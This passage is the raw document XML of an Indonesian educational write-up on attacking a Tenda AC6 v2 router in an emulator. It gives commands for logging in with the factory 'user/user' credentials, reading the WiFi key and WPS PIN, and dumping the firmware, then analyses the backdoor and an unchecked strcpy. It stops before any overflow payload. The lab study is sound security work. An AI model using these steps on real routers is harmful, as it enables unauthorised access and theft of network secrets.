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7A0D0D"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Dari Reconnaissance sampai Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Laporan Lengkap Eksploitasi Buffer Overflow Tenda AC6 v2</w:t>
        <w:br/>
        <w:t>(di emulator terisolasi, perangkat milik sendiri)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Ditulis dengan penjelasan bahasa awam + gambar di setiap langkah yang membingungkan</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Disusun oleh: Farrel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Target: Tenda AC6 v2 (Realtek RTL8197F), firmware V15.03.06.51_multi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Metode: emulasi QEMU/FirmAE terisolasi total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Hasil akhir: shell ROOT (UID 0) berhasil didapat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Peringatan &amp; Etika (baca dulu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Laporan ini dibuat untuk BELAJAR, pada perangkat yang benar-benar milik penulis (lab pribadi). Semua pengujian dilakukan di emulator yang terisolasi, tidak menyentuh jaringan/perangkat orang lain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Jangan pakai ilmu ini pada perangkat yang bukan milik Anda — itu ilegal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Untuk pengujian asli, selalu: minta izin tertulis, siapkan firmware resmi + cara recovery, dan sebaiknya punya akses UART.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Data pribadi (nama WiFi, password, MAC) sudah disamarkan di laporan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Cerita Singkat untuk Orang Awam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Bayangkan router itu seperti rumah. Ada pintu depan bernama 'halaman login'. Ternyata pabriknya meninggalkan satu kunci cadangan rahasia: username 'user' dan password 'user'. Siapa pun yang tahu kombinasi ini bisa masuk sebagai admin — tanpa tahu password asli rumah tersebut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Lebih parah: di dalam program utama router (file bernama httpd) ada sebuah kotak penyimpanan kecil (buffer) yang menerima data dari form 'nama WiFi (SSID)'. Program menyalin data itu TANPA memeriksa panjangnya. Kalau kita kirim nama WiFi yang sangat panjang, data itu 'meluber' keluar kotak dan menimpa catatan penting di dalam memori: alamat tujuan program setelah fungsi selesai (disebut return address).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dengan menimpa catatan itu secara cermat, kita bisa membelokkan jalan program ke fungsi bawaan bernama system(), lalu menyuruhnya menjalankan perintah kita. Hasilnya: sebuah pintu rahasia (telnetd) terbuka dan kita masuk sebagai super-user (root).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Inti pelajaran: input dari pengguna HARUS diperiksa panjangnya. Satu kata 'strcpy' tanpa batas bisa membuka pintu belakang penuh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="1596669"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig1_pipeline.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="1596669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 1. Peta perjalanan: dari pengintaian sampai shell root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Dasar yang Perlu Dipahami (versi sederhana)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Apa itu firmware?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Firmware = 'otak' perangkat yang tersimpan di chip memori. Di dalamnya ada sistem operasi kecil (Linux), program web server (httpd), dan file halaman web. Kalau kita bisa mengambil firmware, kita bisa membacanya seperti membongkar buku.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Apa itu buffer overflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Program menyediakan wadah dengan ukuran tetap, misal 64 byte, untuk menampung nama WiFi. Kalau nama yang dimasukkan lebih panjang dari 64 byte dan program tidak memeriksa, sisa data menulis ke memori sebelahnya. Memori sebelah itu berisi nilai-nilai penting, termasuk 'ke mana program melanjut setelah selesai'. Itulah yang kita bajak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Apa itu RCE dan shell?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>RCE (Remote Code Execution) = menjalankan perintah di perangkat dari jarak jauh. 'Shell' = jendela tempat kita mengetik perintah, seperti command prompt. Kalau shell itu milik root, kita praktis menguasai perangkat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2232171"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig8_mitig.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2232171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 2. Pelindung yang seharusnya ada, tetapi tidak aktif di program ini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Alat &amp; Bahan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9"/>
              </w:rPr>
              <w:t>Kategori</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nmap, curl, browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ambil &amp; bedah firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>endpoint /cgi-bin/DownloadFlash, binwalk, unsquashfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Analisis statis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Binary Ninja (decompiler HLIL) + objdump/readelf (MIPS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Emulasi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FirmAE + QEMU system-mipsel (mode terisolasi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dynamic/debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GDB (gdbstub QEMU), strace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Eksploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Python, pwntools, curl/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Semua berjalan di lab pribadi (Parrot Linux VM), dengan pengujian jaringan asli disimpan sebagai bukti awal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Tahap 1 — Reconnaissance (pengintaian)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Menemukan perangkat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ ip route            # melihat gateway (router)</w:t>
        <w:br/>
        <w:t>$ nmap -sT -p- 192.168.0.1</w:t>
        <w:br/>
        <w:t>80/tcp  open  http</w:t>
        <w:br/>
        <w:t>5500/tcp open</w:t>
        <w:br/>
        <w:t>9000/tcp open</w:t>
        <w:br/>
        <w:t>10004/tcp open</w:t>
        <w:br/>
        <w:t>52881/tcp open upnp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Router ada di 192.168.0.1. Port 443 (HTTPS) tertutup — artinya panel admin lewat HTTP biasa (tidak terenkripsi), mudah disadap di jaringan lokal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3444563"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="RPT_RECON_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3444563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 3. Hasil pengintaian port (terminal asli).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Sumber bocor tanpa login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>File-file JavaScript (kode halaman web) bisa diunduh TANPA login. Dari situ kita dapat daftar lengkap alamat 'goform/*' (fungsi-fungsi router) dan versi firmware. Ini mempercepat semua langkah berikutnya.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200 /js/main.js</w:t>
        <w:br/>
        <w:t>200 /js/login.js</w:t>
        <w:br/>
        <w:t>200 /js/macro_config.js</w:t>
        <w:br/>
        <w:t>... (18 file JS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Menemukan backdoor user/user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mencoba login dengan username 'user' dan password 'user' BERHASIL. Ini akun cadangan yang ditanam pabrik. Bandingkan: admin/admin, admin/1234, root/admin, semuanya GAGAL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ curl -i -X POST http://192.168.0.1/login/Auth -d 'username=user&amp;password=user'</w:t>
        <w:br/>
        <w:t>HTTP/1.0 302 Redirect</w:t>
        <w:br/>
        <w:t>Set-Cookie: password=&lt;token&gt;; path=/</w:t>
        <w:br/>
        <w:t>Location: http://192.168.0.1/main.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="3444563"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="RPT_AUTH_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3444563"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 4. Terminal asli: backdoor user/user membalas 302 + Set-Cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5669280" cy="2730617"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig2_backdoor.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="2730617"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 5. Alur backdoor: satu percobaan, kunci admin didapat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dengan cookie itu, password WiFi asli dan PIN WPS terbaca dalam bentuk teks biasa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GET /goform/WifiBasicGet  -&gt; {"wrlPwd":"&lt;WIFI-KEY&gt;"}</w:t>
        <w:br/>
        <w:t>GET /goform/WifiWpsGet    -&gt; {"pinCode":"&lt;WPS-PIN&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Rahasia WiFi di atas adalah milik penulis dan sudah disamarkan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Tahap 2 — Mengambil &amp; Membongkar Firmware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Agar bisa dianalisis tanpa risiko merusak perangkat, kita ambil salinan firmware-nya. Tenda menyediakan endpoint unduh cadangan (DownloadFlash). File hasilnya kemudian 'dibongkar'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ curl -o AC6v2_flash_dump.bin http://192.168.0.1/cgi-bin/DownloadFlash  (dengan cookie)</w:t>
        <w:br/>
        <w:t>$ binwalk -e AC6v2_flash_dump.bin</w:t>
        <w:br/>
        <w:t>$ unsquashfs ...   # menghasilkan folder ac6root/ berisi seluruh isi router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Di dalamnya kita temukan program utama: bin/httpd (server web yang melayani semua halaman &amp; form). Inilah sasaran analisis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bin/httpd   : MIPS 32-bit little-endian, non-PIE, NX off (GNU_STACK RWE), tanpa stack canary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Tahap 3 — Membuka Binary Ninja untuk Mencari Backdoor &amp; Overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Binary Ninja adalah decompiler yang 'membaca ulang' program biner menjadi kode mirip bahasa C (High Level IL). Kita masukkan bin/httpd lalu analisis. Dari sini kita lihat logika backdoor sekaligus fungsi yang rawan overflow. Bagian penting ditandai kotak merah.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Menemukan asal kredensial user/user (backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Penting: kredensial user/user TIDAK ditulis sebagai perbandingan literal 'user' di kode. Itu adalah NILAI DEFAULT pada KONFIGURASI router, yaitu key sys.baseusername dan sys.baseuserpass. Fungsi getwebuserpwd-lah yang membacanya (kotak merah).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="3657600"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bn_backdoor_getwebuserpwd_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 6. Binary Ninja (HLIL) getwebuserpwd — kotak merah: bila utype != 1 dibaca 'sys.baseusername' dan 'sys.baseuserpass' (default user/user).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Nilai default itu terbukti ada di konfigurasi perangkat (mib.cfg):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sys.username     = admin</w:t>
        <w:br/>
        <w:t>sys.userpass     = &lt;md5 password admin asli&gt;</w:t>
        <w:br/>
        <w:t>sys.baseusername = user</w:t>
        <w:br/>
        <w:t>sys.baseuserpass = user        &lt;-- backdoor default (user/user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Saat login, server mencocokkan password dengan sys.userpass (check_password) DAN menerima kredensial base (sys.baseusername/sys.baseuserpass) yang default-nya user/user — itulah sebabnya user/user selalu bisa masuk walau password admin sudah diganti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="3657600"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="bn_backdoor_checkpwd_ann.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Gambar 7. Binary Ninja (HLIL) check_password — kotak merah: perbandingan password dengan 'sys.userpass'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Menemukan fungsi yang rawan overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Kandidat terkuat adalah form_fast_setting_wifi_set (pengaturan cepat nama WiFi). Nama WiFi (ssid) disalin ke buffer lokal dengan strcpy TANPA memeriksa panjang. Kotak merah menandai dua strcpy itu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5852160" cy="3657600"/>
